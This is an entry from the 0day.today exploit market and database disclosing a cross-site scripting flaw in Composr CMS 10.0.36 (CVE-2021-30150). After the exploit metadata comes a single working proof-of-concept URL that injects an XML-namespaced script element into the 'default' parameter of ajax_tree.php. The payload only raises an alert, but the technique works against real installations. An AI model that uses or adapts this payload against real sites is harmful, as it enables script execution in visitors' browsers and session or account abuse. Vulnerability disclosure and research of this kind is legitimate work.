[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Composr CMS 10.0.36 - Cross Site Scripting Vulnerability

Author
Orion Hridoy
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-36082
Category
web applications
Date add
07-04-2021
CVE
CVE-2021-30150
Platform
php
# Exploit Title: Composr CMS 10.0.36 - Cross Site Scripting
# Exploit Author: Orion Hridoy
# Vendor Homepage: https://compo.sr/
# Software Link: https://compo.sr/download.htm
# Version: 10.0.36
# Tested on: Windows/Linux
# CVE : CVE-2021-30150

Vulnerable Endpoint:
https://site.com/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script>

#  0day.today [2024-11-16]  #